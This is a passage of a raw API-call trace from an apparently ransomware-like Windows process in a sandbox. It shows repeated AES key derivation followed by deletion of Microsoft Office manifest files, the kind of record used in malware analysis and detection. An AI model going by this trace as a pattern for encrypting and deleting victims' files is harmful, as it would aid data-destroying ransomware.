0x2 [0175.649] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.649] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.649] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0175.649] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0175.649] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0175.651] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0175.651] CryptHashData (hHash=0x9ad578, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0175.651] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad138) returned 1 [0175.651] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0175.651] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0175.651] wcslen (_String="\\\\?\\") returned 0x4 [0175.676] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 1 [0175.676] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml")) returned 1 [0175.677] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0175.677] wcslen (_String="OK") returned 0x2 [0175.677] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.677] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.677] CryptDestroyKey (hKey=0x9ad138) returned 1 [0175.677] CryptDestroyHash (hHash=0x9ad578) returned 1 [0175.677] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0175.679] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0175.679] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0175.679] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad5f8) returned 1 [0175.679] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0175.679] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0175.679] wcslen (_String="\\\\?\\") returned 0x4 [0175.694] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 1 [0175.694] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml")) returned 1 [0175.695] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0175.695] wcslen (_String="OK") returned 0x2 [0175.695] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.695] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.695] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0175.695] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0175.695] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0175.697] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0175.697] CryptHashData (hHash=0x9ad878, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0175.697] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad378) returned 1 [0175.697] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0175.697] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0175.697] wcslen (_String="\\\\?\\") returned 0x4 [0175.720] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 1 [0175.720] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml")) returned 1 [0175.721] CryptDestroyKey (hKey=0x9ad478) returned 1 [0175.721] wcslen (_String="OK") returned 0x2 [0175.721] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.721] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.721] CryptDestroyKey (hKey=0x9ad378) returned 1 [0175.721] CryptDestroyHash (hHash=0x9ad878) returned 1 [0175.721] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0175.724] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0175.724] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0175.724] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad7b8) returned 1 [0175.724] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0175.724] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0175.724] wcslen (_String="\\\\?\\") returned 0x4 [0176.105] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml") returned 1 [0176.105] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml")) returned 1 [0176.108] CryptDestroyKey (hKey=0x9ad438) returned 1 [0176.108] wcslen (_String="OK") returned 0x2 [0176.108] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.108] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.108] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0176.108] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0176.108] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0176.111] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0176.111] CryptHashData (hHash=0x9ad738, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.111] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad778) returned 1 [0176.111] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0176.111] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0176.111] wcslen (_String="\\\\?\\") returned 0x4 [0176.116] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml") returned 1 [0176.116] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0409-1000-0000000ff1ce.xml")) returned 1 [0176.117] CryptDestroyKey (hKey=0x9ad178) returned 1 [0176.117] wcslen (_String="OK") returned 0x2 [0176.117] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.117] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.117] CryptDestroyKey (hKey=0x9ad778) returned 1 [0176.117] CryptDestroyHash (hHash=0x9ad738) returned 1 [0176.117] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0176.119] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44486c | out: phHash=0x1d44486c) returned 1 [0176.119] CryptHashData (hHash=0x9ad338, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.119] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d444870 | out: phKey=0x1d444870*=0x9ad678) returned 1 [0176.119] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0176.119] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0176.119] wcslen (_String="\\\\?\\") returned 0x4 [0176.207] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 1 [0176.207] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml")) returned 1 [0176.208] CryptDestroyKey (hKey=0x9ad778) returned 1 [0176.208] wcslen (_String="OK") returned 0x2 [0176.208] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.208] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.208] CryptDestroyKey (hKey=0x9ad678) returned 1 [0176.208] CryptDestroyHash (hHash=0x9ad338) returned 1 [0176.208] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0176.210] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0176.210] CryptHashData (hHash=0x9ad3b8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.210] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad3b8, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad438) returned 1 [0176.210] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0176.210] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0176.210] wcslen (_String="\\\\?\\") returned 0x4 [0176.213] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml") returned 1 [0176.213] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0409-1000-0000000ff1ce.xml")) returned 1 [0176.214] CryptDestroyKey (hKey=0x9ad738) returned 1 [0176.214] wcslen (_String="OK") returned 0x2 [0176.214] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.214] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.214] CryptDestroyKey (hKey=0x9ad438) returned 1 [0176.214] CryptDestroyHash (hHash=0x9ad3b8) returned 1 [0176.214] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0176.216] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44498c | out: phHash=0x1d44498c) returned 1 [0176.216] CryptHashData (hHash=0x9ad738, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.216] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444990 | out: phKey=0x1d444990*=0x9ad138) returned 1 [0176.216] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0176.216] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0176.216] wcslen (_String="\\\\?\\") returned 0x4 [0176.310] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 1 [0176.310] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml")) returned 1 [0176.311] CryptDestroyKey (hKey=0x9ad238) returned 1 [0176.311] wcslen (_String="OK") returned 0x2 [0176.311] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.311] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.311] CryptDestroyKey (hKey=0x9ad138) returned 1 [0176.312] CryptDestroyHash (hHash=0x9ad738) returned 1 [0176.312] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0176.314] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0176.314] CryptHashData (hHash=0x9ad378, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.314] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad1f8) returned 1 [0176.314] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0176.314] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0176.314] wcslen (_String="\\\\?\\") returned 0x4 [0176.318] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 1 [0176.318] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml")) returned 1 [0176.319] CryptDestroyKey (hKey=0x9ad538) returned 1 [0176.319] wcslen (_String="OK") returned 0x2 [0176.319] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.319] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.319] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0176.319] CryptDestroyHash (hHash=0x9ad378) returned 1 [0176.319] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0176.321] CryptCreateHash (in: hProv=0x8e3908, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0176.322] CryptHashData (hHash=0x9ad238, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.322] CryptDeriveKey (in: hProv=0x8e3908, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad1b8) returned 1 [0176.322] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0176.322] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0176.322] wcslen (_String="\\\\?\\") returned 0x4 [0176.330] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 1 [0176.330] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml")) returned 1 [0176.331] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0176.331] wcslen (_String="OK") returned 0x2 [0176.331] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.331] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.331] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0176.331] CryptDestroyHash (hHash=0x9ad238) returned 1 [0176.331] CryptReleaseContext (hProv=0x8e3908, dwFlags=0x0) returned 1 [0176.334] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0176.334] CryptHashData (hHash=0x9ad878, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.334] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad178) returned 1 [0176.334] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0176.334] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0176.334] wcslen (_String="\\\\?\\") returned 0x4 [0176.338] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 1 [0176.338] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml")) returned 1 [0176.339] CryptDestroyKey (hKey=0x9ad638) returned 1 [0176.339] wcslen (_String="OK") returned 0x2 [0176.339] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.339] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.339] CryptDestroyKey (hKey=0x9ad178) returned 1 [0176.339] CryptDestroyHash (hHash=0x9ad878) returned 1 [0176.339] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0176.342] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0176.342] CryptHashData (hHash=0x9ad138, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.342] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad5b8) returned 1 [0176.342] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0176.342] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0176.343] wcslen (_String="\\\\?\\") returned 0x4 [0176.887] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 1 [0176.887] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml")) returned 1 [0176.898] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0176.898] wcslen (_String="OK") returned 0x2 [0176.898] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.898] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.898] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0176.898] CryptDestroyHash (hHash=0x9ad138) returned 1 [0176.898] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0176.904] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0176.904] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.904] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad538) returned 1 [0176.905] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0176.905] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0176.905] wcslen (_String="\\\\?\\") returned 0x4 [0176.937] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 1 [0176.938] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml")) returned 1 [0176.940] CryptDestroyKey (hKey=0x9ad478) returned 1 [0176.940] wcslen (_String="OK") returned 0x2 [0176.940] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.940] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.940] CryptDestroyKey (hKey=0x9ad538) returned 1 [0176.940] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0176.940] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0176.946] CryptCreateHash (in: hProv=0x8e3770, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0176.946] CryptHashData (hHash=0x9ad838, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.946] CryptDeriveKey (in: hProv=0x8e3770, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad278) returned 1 [0176.946] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0176.946] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0176.946] wcslen (_String="\\\\?\\") returned 0x4 [0176.953] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml") returned 1 [0176.954] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-3101-0000-1000-0000000ff1ce.xml")) returned 1 [0176.958] CryptDestroyKey (hKey=0x9ad238) returned 1 [0176.958] wcslen (_String="OK") returned 0x2 [0176.958] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.958] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0176.958] CryptDestroyKey (hKey=0x9ad278) returned 1 [0176.958] CryptDestroyHash (hHash=0x9ad838) returned 1 [0176.959] CryptReleaseContext (hProv=0x8e3770, dwFlags=0x0) returned 1 [0176.965] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0176.965] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0176.965] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad2f8) returned 1 [0176.966] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0176.966] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0176.966] wcslen (_String="\\\\?\\") returned 0x4 [0177.575] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.16.xml") returned 1 [0177.576] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.16.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.16.xml")) returned 1 [0177.577] CryptDestroyKey (hKey=0x9ad338) returned 1 [0177.577] wcslen (_String="OK") returned 0x2 [0177.577] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0177.577] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0177.577] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0177.577] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0177.577] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0177.579] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0177.579] CryptHashData (hHash=0x9ad478, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0177.579] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad5f8) returned 1 [0177.579] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0177.579] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0177.580] wcslen (_String="\\\\?\\") returned 0x4 [0177.626] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.16.en-us.xml") returned 1 [0177.626] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifestLoc.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifestloc.16.en-us.xml")) returned 1 [0177.651] CryptDestroyKey (hKey=0x9ad438) returned 1 [0177.651] wcslen (_String="OK") returned 0x2 [0177.652] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0177.652] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0177.652] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0177.652] CryptDestroyHash (hHash=0x9ad478) returned 1 [0177.652] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0177.655] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0177.655] CryptHashData (hHash=0x9ad838, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0177.655] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4448e8 